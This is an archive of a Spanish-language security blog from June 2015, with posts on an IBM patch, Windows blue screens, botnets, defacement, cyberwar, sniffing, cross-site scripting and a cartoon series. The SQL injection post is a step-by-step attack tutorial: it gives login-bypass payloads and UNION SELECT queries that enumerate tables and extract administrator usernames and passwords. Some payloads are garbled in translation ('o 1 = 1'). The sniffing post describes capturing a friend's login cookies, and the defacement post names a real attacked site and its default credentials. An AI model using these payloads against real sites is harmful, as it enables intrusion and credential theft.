lunes, 29 de junio de 2015

Multiples Vulnerabilidades Resueltas En IBM Security Directory Server



Figura 1 : 6 vulnerabilidades resueltas

según lo publicado por  hispasec.com el día de hoy han sido corregidas 6 vulnerabilidades en IBM Security Directory Server, las cuales permitían a los atacantes ejecutar coman-dos de código arbitrario,para la  obtención de información sensible,y realizar ataques de cross-site scripting y a usuarios locales para su  obtener información.

todo esto gracias a una vulnerabilidad encontrada en el IBM Security Directory Serve antes conocido como IBM Tivoli Directory Server, un software  de  identidad OBM basado en tecnología LDAP (Lightweight Directory Access Protocol), que proporciona una infraestructura de datos de identidad de confianza para la autenticación. Soporta plataformas IBM AIX, i5, Solaris, Windows, HP-UX.      




 Hasta Pronto ....

domingo, 28 de junio de 2015

La Pantalla Azul De La Muerte en Windows "Blue Screen of Death"



Figura 1 :Blue Screen Of Death

La mayoría de usuarios de windows alguna vez hemos podido presenciar la pantalla azul o BSOD "Blue Screen of Death"en nuestro ordenador, ya sea al reiniciar nuestro dispositivo o en el momento menos esperado, después de recibir una notificación que se debe a un error, de manera que siempre se espera que windows reinicie correctamente y no sea necesario una re-instalación del sistema operativo.

aunque la mayoría delas veces no se le suele colocar atención a este aviso,es recomendable revisar el hardware y  el sotfware, puesto que puede ser el inicio de una serie de  conflictos  en el  ordenador.



Figura 2:BSOD "Blue Screen of Death" en  windows  7

Que son los errores de  pantalla  azul,pantalla de la muerte,Blue Screen of Death  o stop

Es una alerta iniciada por el sistema, al recibir uno delos mensajes de error considerados como críticos,la solución predeterminada por el sistema es recopilar toda la información posible sobre el error, guardarla  y  apagar el equipo de inmediato para evitar daños irreparable.Cuando en nuestro ordenador ocurre un problema considerado como critico  ya sea en el   hardware o del sotfware, windows   se reinicia  para evitar  daños pero al mismo tiempo suele aparecer la pantalla azul, indicando que "Windows se ha recuperado de un error grave o de un cierre inesperado", la mayoría de errores que provocan la pantalla azul son a nivel de sotfware, es decir programas instalados, driver's entre otros, cuando hablamos  que es a nivel de hardware  no referimos  al estado físico  del dispositivo ya se  la tarjeta madre, la tarjeta ram, la  unidad de disco duro etc...siempre que  ocurre un error que provoca la pantalla azul el sistema guarda los detalles en la carpeta Minidump, en un archivo de texto plano,dicha carpeta se encuentra ubicada en la siguiente ruta: C:\Windows\Minidump esto es para posterior mente realizar un análisis detallado sobre el  error.



Figura 3:BSOD En Windows 8

en windows 8 estos mensajes de la pantalla azul  suelen venir con la información de dicho acontecimiento

los errores que son fatales son aquellos que involucran la tarjeta ram o el disco  duro por que son irreparables y requieren un nuevo hardware para su buen funcionamiento,cuando ocurren este tipo de daños suele aparecer lo que  se conoce como la pantalla negra de la muerte  o BlSoD"Black Screen of Death" al reinicio ,ya sea por que el disco duro a dejado de funcionar por completo, o por simples partículas de polvo en nuestro ordenador por eso es aconsejable realizar-le mantenimiento a nivel de hardware por lo menos 2 veces al año y máximo 5 esto a nivel interno, los conflictos de la pantalla azul no se solucionan realizando una re-instalación del sistema, lo mas lógico y útil es realizar el reconocimiento de dicho problema para su posterior  solución.



Figura 4: BlSoD"Black Screen of Death" en  windows  8

existen  diferentes  códigos de error cuando se produce la pantalla azul el mas temido es :


"STOP: 0x0000008E" "KERNEL_MODE_EXCEPTION_NOT_HANDLED"

devido  aque aparece cuando hay:

1)Daños en el disco duro.

2)Daños en el registro.

3)Problemas de configuración de hardware general con el BIOS, la memoria, el disco duro, o con otros dispositivos.

4)Controlador de dispositivo incompatible.


5)Software incompatible.

Algunas de  las soluciones a este problema pueden ser:

1)Iniciar el sistema utilizando la opción Última configuración válida conocida.

2)Utilizar la característica Volver al controlador anterior.

3)Utilizar Restaurar sistema.


4)Examinar hardware recién instalado.

Los siguientes son algunos de los errores mas comunes que solo nececitan un reinicio adecuado del sistema:

"STOP: 0x00000002" "DEVICE_QUEUE_NOT_BUSY"
"STOP: 0x00000003" "INVALID_AFFINITY_SET"
"STOP: 0x00000004" "INVALID_DATA_ACCESS_TRAP"
"STOP: 0x00000005" "INVALID_PROCESS_ATTACH_ATTEMPT"
"STOP: 0x00000006" "INVALID_PROCESS_DETACH_ATTEMPT"
"STOP: 0x00000007" "INVALID_SOFTWARE_INTERRUPT"
"STOP: 0x00000008" "IRQL_NOT_DISPATCH_LEVEL"
"STOP: 0x00000009" "IRQL_NOT_GREATER_OR_EQUAL"
"STOP: 0x00000016" "CID_HANDLE_CREATION"
"STOP: 0x00000028" "CORRUPT_ACCESS_TOKEN"

"STOP: 0x00000056" "INSTRUCTION_COHERENCY_EXCEPTION"

Existen diversa información sobre este tipo de errores, tanto así como herramientas que nos brindan diversa información sobre cada uno de estos errores así como lo es Windows Error Lookup Tool. un sotfware totalmente gratuito.

Así como hay software que nos permite identificar que tipo de error es hay otros como BlueScreenView que nos permite analizar los logs  generados por los errores de la pantalla azul.

Para mas información sobre como realizar el respectivo análisis de los errores de la pantalla azul o BSOD "Blue Screen of Death" visita NORFIP


Espero que  esta información  te sea de  utilidad


Hasta Pronto...

sábado, 27 de junio de 2015

El Ciberdelincuente Que Robaba Las Millas De Viajero Frecuente De Los Famosos



Figura 1: Ciberdelincuencia 

El dia 25 de junio fue  capturado el  joven de 23 años Jaime Alejandro Solano Moreno, quien a travez de técnicas de phishing y correos falsos, e ingeniería social ,lograba recolectar la información de sus victimas haciéndose pasar por trabajador de avianca, en menos de 4 meses fue capas de robar mas de 5 millones de millas a artistas como Juanes, Silvestre Dangond, Iván Villazón, Sofía Vergara, Luly Bosa y Kathy Sáenz. Asimismo presentadoras como Carolina Cruz, Laura Acuña; periodistas como Silvia Corzo y Claudia Gurisatti y hasta personajes públicos como Yidis Medina.



Figura 2:  imagen tomada de el periodico ELTIEMPO

hoy en día se encuentra en la carcel la modelo de Bogota,Colombia, donde lleva proceso por acceso abusivo a sistema informatico Hurto por medios  informáticos, estafa y transferencia no concedida de activos.

para  mas  infromacion  consulte en EL TIEMPO

Hasta Pronto...

miércoles, 24 de junio de 2015

Nueva Publicaciòn De Wikileaks Pone En Riesgo Relaciones Entre Francia y Estadosunidos


figura 1:Imagen  tomada  de  wikileaks


El día 23 de junio fueron publicados por  Wikileaks, documentos reveladores con el nombre de , "Espionaje  Eliceo" una colección de SECRET TOP ,informes de inteligencia y documentos técnicos de la Agencia de Seguridad Nacional de Estados Unidos (NSA) en relación con la orientación y las señales de inteligencia, la intercepcion de las comunicaciones de los altos funcionarios del gobierno Frances,entre los cuales se encuentran el actual presidente  Francois Hollande y los anteriores Jacques Chirac y Nicolas Sarkozy. 

Las interceptaciones  de las comunicaciones, se han  realizado al parecer desde  hace  10 años por parte del gobierno  estadounidense,al gobierno francés. 

entre los documentos publicados por  Wikileaks se puede observar los"selectores" utilizados para interceptar las llamadas,pudiendo utilizar para ello la interceptación de las llamadas en la red, o directamente infectando los terminales como se hizo en reuniones del G8 y G20.,


figura 2 : Los  selectores de espionaje 

  

figura 3:Glosario

En los documentos también se puede ver con detalle, como la NSA, podría estar  siguiendo todas y cadas una de las comunicaciones de los presidentes europeos,para tener información detallada de sus movimientos.aunque los archivos que hasta el momento sean publicado en Wikilieans  están fechados apartir del 2006 hasta  el 2012,


figura 4: Reportes  de  intercepciones 


figura 5: Reporte   de espionaje realizado  al gobierno Frances


Nuevamente el mundo pone sus ojos ante los acontecimientos de espionaje realizados por parte del gobierno estadounidense a los gobiernos europeos, pero todo queda al analizis del gobierno francas y a las explicaciones solicitadas al gobierno de estados unidos..

Hasta Pronto...

martes, 23 de junio de 2015

Que es una BOTNET y Como Detectarla



figura 1: bot 

BOTNET es la palabra o diminutivo utilizado para referirnos a una red de robots informáticos o BOTS, que se ejecutan de manera autónoma y automática, los atacantes suelen utilizar código malicioso en forma incrustado en  un  software privativo y de costo, suelen distribuirlo de forma gratuita, con esto lograran infectar la computadora de la víctima  y podrán,tener  el control total su ordenador a los ordenadores que se infectan seles como se cómo BOT’S “ZOMBI”,esto permite que el atacante cree una red más grande de ordenadores infectados , a la red como tal se le conoce como BOTNET.



imagen 2: estructura de un ataque con bots

Los delincuentes usan BOTNETS para enviar mensajes de correo electrónico no deseados “spam”, propagar virus, atacar equipos y servidores web y cometer otros tipos de delitos y fraudes.Si su equipo forma parte de una BOTNET,el equipo puede volverse más lento y puede estar ayudando a los delincuentes sin darse cuenta.

Una de las formas actuales  de ataque en las que se utiliza una BOTNET es para causa un ataque DDOS “denegación de  servicios”.


figura 3: DDOS

Por lo  general una Botnet viene al acompañada de un troyano aparte de utilizar gran parte de los recursos de tu ordenador se vuelve un peligro  total al poseer SPYWARE. SUELEN CAMBIAR DE ASPECTO TU NAVEGADOR POR DEFAULT Y PONER CARPETAS FANTASMA EN TU SISTEMA OPERATIVO,ASIGNANDOLE GRAN CANTIDAD DE TAREAS.

Una de las formas mas sencillas para saber si eres parte de una botnet es ver las conexiones  entrantes  de tu ordenador y revisar los  puertos que tienes  abiertos en el.

para eso solo  debes realizar   unos cuantos  pasos

1)  utiliza las teclas  windows + r para  abrir la ventana de ejecutar

2) en dicha consola  escribe cmd  y da enter 

3)  te saldra la  consola de  simbolo del  sistema en la cual colocaras  netstat -ano 

4) te mostrara una lista de las conexiones externas  establecidas  y  mostrara el puerto que utiliza 

5) da clic  izquierdo  en la  barra de tareas  y  ve a administrador de tareas 

6) luego  ve ala pestaña de detalles de  e administrador de tareas y compara y detén todas las tareas que no estés realizando  o desconecta las conexiones extrañas 

y por supuesto  nuestros móviles no se escapan de ser un bot  pero mas adelante os contare  sobre los dispositivos moviles y sus  vulnerabilidades.

Hasta Pronto...


lunes, 22 de junio de 2015

¿Que es un Defacement?




figura 1:sitio web desfigurado texto en español


un Defacement es la sustitución o modificación de las páginas de un sitio web, existen diversas razones por las que se realiza un Defacement, una de ellas y tal ves la mas conocida es realizada por Hactivistas, personas que de muestran su desacuerdo al gobierno,empresas o por un simple simple me pase por aquí y oye que fácil es de hackearte, las tecnicas  para realizar  un Defaceman van desde la sustitución de la página de inicio,la ejecución de script’s en páginas existentes hasta la sustitución DNS o el envenenamiento de la  cache  del mismo.

Por lo general  nos Defacement  no suelen causar gran daño a la infraestructura  de la pagina web, pero  no en todos los casos es así  a continuación os  dejare un Defacement realizado el día de hoy  hace no menos de 8 horas  a la universidad militar  bolivariana de Venezuela, el lugar  nada mas y nada menos que el sistema de registro delos cadetes.



figura 2: pagina ala que se  le a realizado el  Defacement



su fallo tener el usuario por defecto como admin y el password como admin ,el ataque fue realizado por  un grupo de Hactivistas llamados  KELVINSECURITY,






Hasta Proto .....

domingo, 21 de junio de 2015

¿Que es y como funciona SQL inyección ?


figura 1: SQLI imagen tomada de  xtremehackz007.com

El SQLStructured Query Language” o lenguaje de consulta  estructurado, es un lenguaje de consulta para  bases de datos creado alrededor de 1973 por investigadores de IBM, el SQLI es una vulnerabilidad centrada en consultas de la base de datos de una aplicación, esta vulnerabilidad puede estar en todo tipo de lenguajes de programación como por ejemplo PHP, JAVA, PERL, C#, ASP, dicha vulnerabilidad  fue descubierta en 1999 y a día de hoy se sigue utilizando, tanto para  la realizar auditorías de seguridad así como para, realizar instrucciones en sistemas informáticos.Una Inyección SQL o SQLi suele suceder cuando se inyecta un código SQL al lenguaje para alterar el contenido y su funcionamiento normal y hacer que se ejecute el código malicioso en la base de datos. La mayor de las veces estos errores en las SQL son por la ignorancia del lenguaje pero este código puede ser reparado por programadores o personas que tengan el conocimiento suficiente para poder reparar el error.

Si  un sitio web es  vulnerable bastara  realizar una  sentencia  en  SQL tan  fácil  como  una  coma (‘)en la URL de  dicho  sitio  hecho esto  nos  saldrá  un  erro de  sentencia,ejemplo


pagina.com./search.php?id=1 ’


Error [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'o 1 = 1--' and password = '24eac25cb9e14577e0defdf9e50645c839ff62c4' and activo ' at line 1] en el query [] que está en la linea 380 del archivo Autenticacion.class.php


También,existen cientos de formas  y maneras para  logearte a un sitio web,a través de  sentencias sql esto ocurre gracias a un error de interpretación  por parte del servido r de la base de  datos , aquí les dejo unas cuantas, cada una  debe utilizarse como usuario  y contraseña.


figura 1:forma de  logearte 



figura 2: resultado del   intento de ingreso "positivo"


User : ‘or’1’=’1 ‘or’1’=’1
Password: ‘or’1’=’1 ‘or’1’=’1

1) admin '- 
2) admin '#
3) admin '/ * 
4) 'o 1 = 1—
5) 'o 1 = 1 #
6) 'o 1 = 1 / * 
7) ') o' 1 '=' 1—
8) ') o ('1' = '1—                                                                               
9) ‘or’1’=’1
10) ‘or’1’=’1 ‘or’1’=’1


Uno de los lenguajes que más posee esta  vulnerabilidad en  sitios  web es el php por lo tanto la mayoría  de ataques van dirigidos a páginas con  este  tipo de  lenguaje de programación,  por lo tanto realizaremos el tutorial basándonos en este lenguaje.


Para saber si el sitio es vulnerable existen varias formas de saber, como la versión del lenguaje php, si te creaste una Web con un auto instalador como SMF, PHP NUKE.

procura siempre tener la versión más nueva, ya que existen exploits o vulnerabilidades que pueden ser explotadas para que el sitio tenga un mal funcionamiento, se dice que PHP NUKE es uno de los proveedores de sitios php más vulnerables, no se garantiza tenerlo solo por sus Themes "Temas" y su facilidad, se recomienda hacer páginas Web con el lenguaje HTML.

Tu sitio Web podría ser vulnerable a sus ID, actions, opcions, etc., estas vulnerabilidades quizás tu ya las hallas visto como:

pagina.com/search.php?id=NUMERO
pagina.com/menu.php?act=NUMERO
pagina.com/index.php?opc=NUMERO

Algunos de esos podrían tener una vulnerabilidad SQLi para poder saber si tiene una vulnerabilidad habrá que hacer una consulta como:

pagina.com/search.php?id=-1
pagina.com/menu.php?act='2
pagina.com/index.php?opc=99999999999999999999999999

Hay que probar con esas que son las básicas, en la primera sale -1, las páginas siempre están con números positivos es raro ver una página Web que tenga opciones con -1, -2 entonces causa de esto puede salir un error de SQLi, la pantalla podría ponerse blanca, etc.

En la segunda es un '2, ¿por qué '?, porque ' es un signo que no se usa en las páginas webs, o acaso has visto una Web que use ', el 2 es cualquier número pero la mayoría de las veces resulta el número 2, para saber si funciona sale lo mismo que en el ejemplo anterior.

En la tercera nunca ponen tantos números si te das cuenta casi siempre el usuario admin es pagina.com o 1 porque es el primer miembro que estuvo pero si yo pongo pagina.com la página Web colapsa y entregaría errores.

Ejemplo de error:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/public_html/users.php on line 16



figura 3:error de syntax



PD: IMPORTANTE, si la web es vulnerable los 99999999 y -1 solo pueden continuar, el '2 da errores.

Si el sitio Web resulta vulnerable, y si es tú Web tendrías que saber si entrega datos importantes como la "Information_schema.tables", que contiene toda información del sitio Web, las columnas, tablas, etc.

Primero como ya sabemos que el sitio Web es vulnerable debemos poner:

pagina.com/users.php?id=-1+

Tenemos que poner el signo "+" pero obviamente antes la vulnerabilidad encontrada
luego debemos hacer un union+select+ que es para unir la selección de la vulnerabilidad y seguir, ahora:

pagina.com/users.php?id=-1+union+select+

Quedaría así, como ya tenemos eso ahora debemos poner los números para ver que numero es el que tiene el error, una de las formas que se utiliza es así:

pagina.com/users.php?id=-1+union+select+1,2,3,4,n

Tenemos que hacer esto hasta que la web muestre números o cambie, pero debe mostrar números esos números que muestre son los errores, entonces podemos ver si nuestra Web es vulnerable o no, para saber tenemos que ver la versión:

pagina.com/users.php?id=-1+union+select+1,2,3,@@version,5,6,7,8,9

Si fuera tu Web y es vulnerable podría decir algo como: 5.0.38-Ubuntu_0ubuntu1.4 ahora que tenemos la versión este es un breve resumen de las versiones:

Versión 5.X.XX tienen information_schema.tables (Mas Probabilidad de ser atacadas)

Versión 4.X.XX no tienen information_schema.tables (Menos Probabilidad de ser atacadas)


Lo demás es el S.O que se está usando en el Host. Si tu Web no es 5.X.XX podrías estar feliz de que tienes menos posibilidad de que "Defaceen" tu sitio Web.Pero si tu Web es 5.X.XX tienes más probabilidades, para saber si tu página Web muestra datos importantes tendremos que borrar lo que hicimos (@@version) y cambiarlo por el número que tenía el error, ahora debemos ver el information_schema.tables de nuestro sitio Web, el código es así:

pagina.com/users.php?id=-1+union+select+1,2,3,group_concat(table_name),5,6, 7,8,9+information_schema.tables

El código en si explicado es cambiar el número que tiene error (que se muestra) por "group_concat(table_name)" que significa que busca el grupo de tablas (Todas) luego de eso seguimos con los otros números y al final se le agrega "+information_schema.tables", si te tira cosas como:

"CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET _APPLICABILITY,etc."

Es porque tu sitio es vulnerable y podrías perderlo si alguien tiene conocimientos y un pensamiento nefasto.

Pero el código anterior es un poco desordenado este es otro compuesto por frases en hexadecimal:

pagina.com/users.php?id=-1+union+select+1,2,3,replace(group_concat(table_na me),0x2C,0x3C62723E),5,6,7,8,9+information_schema. table

Ahora que sabemos que en nuestro sitio es visible el information_schema.tables, debemos saber qué información obtendrá el atacante. 

Primero debemos saber que queremos explorar... como por ejemplo usuarios!

las páginas web no son tan "prehistóricas" para solo poner usuarios y te saldrán los datos así que encriptaremos la tabla que queramos ver a ASCII.

(Convertidor: String to ASCII chart, ASCII to decimal convertor, String to decimal converter, string hexadecimal / hex conversion)

Codificamos a ascii la tabla que queramos y la dejamos anotada, la mía es (97 100 109 105 110)
a nuestro código en ASCII le sacamos los espacios y los remplazamos por comas:

97,100,109,105,110 

Ahora volvemos a el código para ver el information_schema.tables, pero ahora lo que vamos a ver son columnas (Son lo que está dentro de una tabla) Ejemplo:

Tabla: Admin 
Columna: ID, User_Name, Password, Email

Entendido?, entonces remplazamos 

pagina.com/users.php?id=-1+union+select+1,2,3,replace(group_concat(table_na me),0x2C,0x3C62723E),5,6,7,8,9+information_schema. tables 

table_name por column_name 
information_schema.tables por information_schema.columns

quedaría así:

pagina.com/users.php?id=-1+union+select+1,2,3,replace(group_concat(table_co lumn),0x2C,0x3C62723E),5,6,7,8,9+information_schem a.columns

Ahora nos tiraría datos que no habíamos visto, pero ignoren esto, ya que no es muy importante ahora lo que tienen que hacer es agregar después de .columns esto:

Quedaría así:

pagina.com/users.php?id=-1+union+select+1,2,3,replace(group_concat(table_co lumn),0x2C,0x3C62723E),5,6,7,8,9+information_schem a.columns+where+table_name=char(ASCII)--

Ahora ya sabemos lo que está dentro de la tabla que queríamos !, hemos explorado nuestra information_schema.tables eso es un gran avance.

como sabemos todo esto podemos ver que hay en estas columnas!, para saber debemos ir muy atrás y tener nuestro código principal que es este:

pagina.com/users.php?id=-1+union+select+1,2,3,4,5,6,7,8,9

¿Cierto?, Bueno ahora manos a la obra (Frase Prehistórica), Bueno nosotros sabemos que el código donde está el error es el que se ve en la página web que es un número; en esta guía el número es 4 así que remplazaremos el numero 4 por concat(Columna,0x3d,Columna).

Entonces el Código quedaría así:

pagina.com/users.php?id=-1+union+select+1,2,3,concat(Columna,0x3d,Columna), 5,6,7,8,9

No me refiero a que se deba poner sí o sí "Columna" eso se debe renombrar por los datos que nos dio el information_schema.columns, como el ejemplo que di:

Tabla: Admin 
Columna: ID, User_Name, Password, Email

Entonces quedaría así:

pagina.com/users.php?id=-1+union+select+1,2,3,concat(User_Name,0x3d,Passwor d),5,6,7,8,9

Ahora tengo que decirles que este código no está completo, al final de los números les agregamos +from+Tabla--

Entonces quedaría algo así:

pagina.com/users.php?id=-1+union+select+1,2,3,concat(Columna,0x3d,Columna), 5,6,7,8,9+from+admin--

y renombrando quedaría:

pagina.com/users.php?id=-1+union+select+1,2,3,concat(User_Name,0x3d,Passwor d),5,6,7,8,9+from+admin--

Ahora te podría dar tu usuario y clave, si te deniega es porque tu host es más seguro de lo que pensabas, si encuentras este error  es mejor que lo soluciones  o te verás en grandes problemas 

aunque esta  seria  la forma manual  actualmente existen muchas herramientas que nos permiten automatizar  todo  esta  herramientas como havij,hackbar, etc... pero  si  quieres  realmente aprender practica  continuamente, hasta  lograrlo.

Hasta `pronto....






sábado, 20 de junio de 2015

Ciber-Guerra Una Realidad




aunque parezca sacado de ciencia ficción actualmente se vive en la web una guerra, difícil de controlar gracias a la facilidad, de anonimato a través de metodologías  muy avanzadas en el campo de la informática, aunque  la mayoría  de gobiernos  tratan de ocultarlo, esto ya no es un secreto, pues se a convertido en algo muy apetecido por las fuerzas militares y de inteligencia de todo el mundo,como para dejarlo ir, pues para estos, es más barato y practico enviar un Malware elaborado,que una brigada de soldados,con  su respectiva dotación "armas, comida ,ropa,etc"



figura 2: ciberataque en tiempo real 

esto  hace que los  gobiernos dejen de comprar armas , para introducir mentes  brillantes en  diversos campos de la informática,en este sentido  las ventajas  para  los militares también se  pueden  convier en sus vulnerabilidades tal  como ocurrió en el caso de Edwards Snowden un consultor tecnológico estadounidense,criptomatematico,quien trabajo para la" Central Inteligen Agency"CIA y para National Security Agency NSA de Estados unidos,en junio del 2013 hizo públicos a través del diario  The Guardian y el diario The Washington Post,documentos clacificados como Top-SECRET de la National Security Agency NSA,incluyendo  programas de espionaje masivo tal como los proyectos PRISM y XKeyscore

para mas información  visite el siguiente enlace Edwards Joseph Snowden 


figura 3:imagen filtrada del proyecto  PRISM



figura 4: imagen filtrada del proyecto XKeyscore

Dicho esto, hay que decir que mientras que todo el mundo niega hacerlo,"espiar a los demas". algunas organizaciones como la OTAN han encargado a expertos la realización de estudios sobre legislación internacional que puede ser aplicada a la ciberguerra,el ciberespionaje o el ciberterrorismo, dando como resultado el Manual Tallinn, que dice cosas como que es legal MATAR HACKER'S civiles si participan en incidentes.


figura 5: ciberataques  en tiempo real


figura 6:ciberataques en tiempo real

actualmente existen gran cantidad de corporaciones que siguen segundo a segundo los ciberinsidentes, esto con el fin de estudiar los lugares de donde  provienen dichos ataques, así como  los afectados, los cuales permiten la visibilidad en tiempo real de los ciberataques.

aquí les dejo los donde  podrán observarlos




Hasta Pronto ....

jueves, 18 de junio de 2015

Algo Para quitar tu aburrimiento Càlico Electronico


figura 1 :Calico Electrónico la serie 

Càlico Electrónico  es una de las serie animada flash distribuida de forma totalmente gratuita por Internet y una de las mas vistas en el mundo de habla hispana,Calico Electrónico da su primer capitulo en la red,el 1 de junio de 2004, causando  gran impacto entre los  cibernautas españoles, la historia  de la  serie  de animacion  a sido  una montaña rusa devido a bastantes inconbenientes de presupuesto este fue un personaje que se creo para un banner,paso a convertirse en un fenómeno viral y acabo con el cierrre de nikodemo la empresa creadora de la historia,en 2010 este super héroe gordote y levantador de animos por  un tiempo tubo que  bajarse  del carro del  exito.


video 1: 1ra temporada capitulo 1 el enemigo electrónico

La  razon  fue  muy  sencilla  segun dice niko gomez creador  del  personaje animado Calico Electrónico 

“No había otra opción”, cuenta Niko, “Los patrocinadores ya no miran el producto sino las visitas y prefieren a los youtubers, que sacan un vídeo cada día. Cálico estrena capítulo cada dos meses y ellos prefieren la inmediatez a unir la marca a un producto tan conocido.

párrafo tomado del  el  confidencial.


pasaron dos  años  largos  enlos cuales  calico electronico  no producia capitulos nuevos  hasta que en el 2012 llego  informatica64 con Chema Alonso, que compró los derechos y consiguió un atrocinador para estrenar nuevos capítulos. Pero la financiación se volvió a acabar, Informática64 desapareció y el superhéroe se preparaba ya para colgar la capa en la percha.Hasta que surgió una nueva oportunidad.




video 2: Cálico Electrónico - Míra Quién Lucha
uno de los mejores

La editorial 0xWord se quedó con los derechos, lanzó el primer capítulo de la quinta temporada y recurrió a los fans para los siguientes. Niko -creador y culpable del nacimiento de la serie- ha tenido que apuntarse al crowdfunding. Cada capítulo es un proyecto nuevo que necesita entre 1.500 y 2.500 euros; de eso depende la supervivencia de la quinta temporada.

lamentablemente  el ultimo capitulo  de la  quinta temporada de esta serie flash fue  publicada  el 30/04 /2015   aqui les dejo el ultimo capitulo de esta  serie  que tantas vidas alegro. 



video:Cálico Electrónico 5ª Temporada Capítulo 6: El último capítulo de Cálico Electrónico

me despido diciendo  gracias Calico   y  niko  por alegrar miles de vidas. 


hasta pronto ....






miércoles, 17 de junio de 2015

¿Que es sniffing ?

Sniffing  es la técnica  por la cual  podemos ver  los paquetes  de  datos  que  circulan por una  red local “red lan ,red wlan “,Esto se hace mediante aplicaciones que actúan sobre todos los sistemas que componen el tráfico de una red, así como la interactuación con otros usuarios y ordenadores. Capturan, interpretan y almacenan los paquetes de datos que viajan por la red, para su posterior análisis (contraseñas, mensajes de correo electrónico, datos bancarios, etc.)



Figura  1: actuar del atacante

Como se puede observar en la imagen anterior cuando  el  pc  victima de color azul  se comunica con el  web server  este lo  hace  a través del  HUB  , pero  uno  de los  inconvenientes que  tiene el  HUB es que  manda los paquetes de datos  a todos  los hosts conectados  a el , es decir  que  cuando  cuando  el pc victima envía paquetes  al web server , el  web server  no es el único que los  recibe  sino que al mismo tiempo  los  está  recibiendo el  pc atacante,  ahora  bien  si  en lugar de  un HUB hubiera un  SWITCH el sniffer  no  funcionaria , porque  el SWITCH  es inteligente  y  solo manda los  paquetes  de datos    al  lugar de destino, en este caso al web server.

Actualmente  hay  programas que detectan este tipo  de ataque pero mucho cuidado  solo lo detectan , no lo neutralizan.

 ¿Para que se  utiliza el  sniffing?


Usualmente con esta técnica se pueden conseguir contraseñas, de ftp’s,web’s, interceptar comunicaciones , o simplemente investigar cómo funciona un programa.

Imaginemos que estas con un amigo en la misma red y sabes que tu amigo se va a logear en una pagina en la cual hace falta una cuenta para entrar, entonces coges y pones un sniffer a la escucha e interceptas los paquetes que manda tu amigo para logearse, en esos paquetes que ha mandado tu amigo estarán su ID y su contraseña de la pagina en cuestión pero el 90% de las webs lo que hacen es cifrar las contraseñas y después enviarla ,  entonces cuando te hagas con los paquetes de datos lo más seguro es que no te salga la contraseña como tal sino que saldrá un algoritmo, que tendras que crakear para saber la autentica contraseña. Hay algunas webs que permiten la opción de recordar contraseña, cuando marcas esta opción lo que hace la web es crear un cookie con la información de tu cuenta, entonces la próxima vez que entres en la web se mandara el cookie con la información y te logeara automáticamente Si en este caso ponemos un sniffer a la escucha e interceptamos el cookie lo único que tendríamos que hacer seria un cookie poison y ya tendríamos acceso a la web.En resumen se puede usar un sniffer para tantas cosas como se os ocurran, el limite está en la imaginación.



Hasta pronto .....

lunes, 15 de junio de 2015

Un Poco Sobre Cross-site-scripting


figura 1 :portada del libro  oficial sobre xss

Cross-site-scripting es una vulnerabilidad  típica en aplicaciones  web  que  permite  inyectar  código malicioso al código  fuente de la pagina para su posterior ejecucion  en  script “java script, vbs script” evitando  las medidas de  control , dadas por el administrador del sito , en español se conoce como secuencia de ordenes en sitios cruzados.  

Los ataques por secuencia de ordenes en sitios cruzados entre páginas Web (también conocidos como XSS o CSS) son ataques dirigidos a los páginas Web que muestran de forma dinámica el contenido de los usuarios sin verificar ni codificar la información ingresada por ellos. Este tipo de ataque obliga a la página Web a mostrar el código HTML o los comandos ingresados por los usuarios. Por lo tanto, el código incluido (por lo general se usa el término "inyectado") en una página Web vulnerable se considera "malintencionado".




figura 2:  xss dom

Es común que las páginas Web muestren mensajes informativos directamente mediante el uso de un parámetro introducido por el usuario. El ejemplo más clásico es el de las "páginas de error 404". Algunas páginas Web modifican el comportamiento de la página Web de modo que pueda mostrar un mensaje de error personalizado cuando la página solicitada por el visitante no existe. En ciertas ocasiones, la página generada dinámicamente muestra el nombre de aquella que se solicita. A una página Web con dicho error la llamaremos http://paginaweb.vulnerabilidad. La solicitud de la dirección URL del página Web http://pagina web.vulnerable/paginainexistente correspondiente a una página que no existe genera un mensaje de error que indica que la "página inexistente" no existe. En consecuencia, es posible mostrar cualquier contenido desde el página Web remplazando "página inexistente" por cualquier otra cadena.




figura 3:forma de actuar de un atacante

De esta forma, si el contenido suministrado por el usuario no se verifica, es posible mostrar un código HTML arbitrario en una página Web para cambiar su apariencia, contenido o comportamiento.

Asimismo, la mayoría de los navegadores tienen la capacidad de interpretar las secuencias de comandos de las páginas Web, incluso en otros lenguajes, como JavaScript, VBScript, Java, ActiveX o Flash. Las siguientes etiquetas HTML permiten incorporar secuencias de comandos ejecutables en una página Web: <SCRIPT>, <OBJECT>, <APPLET> y <EMBED>.

Por lo tanto, un pirata informático puede inyectar un código arbitrario en la página para que se ejecute en el equipo del usuario cuando intenta garantizar la seguridad de la página Web vulnerable. Para ello, sólo debe remplazar el valor del texto que se mostrará con una secuencia de comandos de modo que aparezca en la página Web. Siempre y cuando el navegador del usuario esté configurado para ejecutar dichas secuencias de comandos, el código malintencionado tendrá acceso a todos los datos compartidos por la página Web y el servidor del usuario (cookies, campos de entrada, etc.)

PDF XSS

Es una vulnerabilidad ampliamente usada para afectar el Acrobat Reader de Adobe. En este caso, si se abusa de las características para abrir archivos en Acrobat, un sitio bien protegido se vuelve vulnerable a un ataque de tipo XSS si da alojamiento a documentos en formato PDF.

Esto afecta seriamente, a menos que se actualice el Reader o se cambie la forma en que el navegador maneja dichos documentos.

Una manera de combatirlo, si se cuenta con el servidor de aplicaciones web Apache, es llevar a cabo la correcta configuración de ModSecurity, ya que cuenta con directivas de protección para archivos en formato PDF.

 XSRF

Un ataque Cross-Site Request Forgery (XSRF ó también CSRF) explota la confianza que un usuario tiene hacia las entradas proporcionadas por un sitio.
Por ejemplo: un usuario se encuentra autenticado y navegando en un sitio, en ese momento un atacante obtiene el control de su navegador, con él realiza una solicitud a una tarea de una URL válida del sitio, por lo que el atacante tendrá acceso como si fuera el usuario previamente registrado.

Distintivamente, un atacante intercalará código HTML o JavaScript malicioso en un correo o en una tarea específica accesible desde una URL, que se ejecuta ya sea directamente o empleando un error de tipo XSS. También, es posible realizar inyección a través de lenguajes como el BBCode. Este tipo de ataques son difíciles de detectar.

Muchas de las funcionalidades de un sitio web son susceptibles de uso durante un ataque XSRF. Esto incluye información enviada tanto por GET como por POST.

También puede usarse como vector para explotar vulnerabilidades de tipo XSS en una aplicación. Ejemplos de ello son: una vulnerabilidad de tipo XSS en un foro donde un atacante puede obligar al usuario a publicar –sin que éste se dé cuenta- un gusano informático. Un atacante puede también usar XSRF para transmitir un ataque a algún sitio de su elección, así como realizar un DDos.

